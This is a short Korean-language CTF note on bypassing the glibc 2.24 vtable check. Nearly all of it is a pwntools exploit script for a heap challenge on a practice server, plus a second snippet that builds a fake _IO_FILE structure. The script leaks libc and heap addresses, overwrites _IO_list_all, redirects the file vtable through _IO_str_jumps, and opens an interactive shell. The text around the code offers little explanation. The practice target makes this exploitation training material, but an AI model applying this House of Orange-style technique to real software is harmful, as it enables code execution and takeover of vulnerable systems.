Vtable check bypass

예제 pwnable.tw notev3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pwn import *
#context.log_level = 'debug'
def make_note(size,title):
    r.sendlineafter('>','1')
    r.sendlineafter('Size:',str(size))
    r.sendafter('Title:',title)
 
def make_note1(size,title,note):
    r.sendlineafter('>','1')
    r.sendlineafter('Size:',str(size))
    r.sendafter('Title:',title)
    r.sendafter('Note:',note)
 
def edit_note(idx,data):
    r.sendlineafter('>','2')
    r.sendlineafter('Note:',str(idx))
    r.sendafter('Data:',data)
 
def list_note():
    r.sendlineafter('>','3')
 
#r=process('./challenge',env={'LD_PRELOAD':'alpine-libc-2.24.so'})
r=remote('svc.pwnable.xyz',30041)
win=0x4008a2
script='''
'''
_IO_str_jumps_off=0x390500
#debug = +21640
#server = -(libc.symbols['__malloc_hook']+88+0x10) 
e=ELF('./challenge')
libc=ELF('./alpine-libc-2.24.so')
make_note(-1,'AAAA')#1
edit_note(0,p64(0)+p64(0x31)+p64(0)*5+'\xb1\x0f\x00'+'\x00'*0xff)
make_note1(0x1000,'\n','\x00'*0xff)#2
make_note(-1,'AAAA'*2)#3
list_note()
r.recvuntil('A'*8)
value=u64(r.recvuntil('\x7f').ljust(8,'\x00'))
log.info(hex(value))
libc_base=value-(libc.symbols['__malloc_hook']+88+0x10) 
_IO_list_all=libc_base+libc.symbols['_IO_list_all']-0x10
log.info(hex(libc_base))
log.info(hex(_IO_list_all))
heap_leak=p64(0)+p64(0x31)+'A'*72
edit_note(0,heap_leak)
list_note()
r.recvuntil('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
heap=u64(r.recv(4).ljust(8,'\x00').replace('\x3a','\x00'))-0x50
log.info(hex(heap))
payload=p64(0)+p64(0x31)+p64(0)*4
fake=p64(0)+p64(0x61)+p64(libc_base)+p64(_IO_list_all)
fake+=p64(2)+p64(3)
fake+=p64(0)+p64(libc_base+list(libc.search('/bin/sh'))[0])
fake+=p64(0)*0x10
fake+=p64(0)
fake+=p64(0)*2
fake+=p64(libc_base+libc.symbols['_IO_file_jumps']+0xc0-0x8)
fake=fake.ljust(0xe8,'\x00')
fake+=p64(win)*40
payload+=fake
edit_note(2,payload)
r.sendlineafter('>','1')
r.sendlineafter('Size:','1')
#gdb.attach(r,script)
r.interactive()
Colored by Color Scripter
cs

https://st4nw.github.io/glibc2.24-orange

1
2
3
4
5
6
7
8
9
10
fake = p64(0) + p64(0x61)
fake += p64(0) + p64(_IO_list_all-0x10)
fake += p64(2) + p64(3)
fake += p64(0) + p64(binsh) # _IO_buf_base
fake += p64(0) * 0x10
fake += p64(0) # mode
fake += p64(0) * 2
fake += p64(_IO_str_jumps-0x8)
fake = fake.ljust(0xe8, '\x00')
fake += p64(system)
cs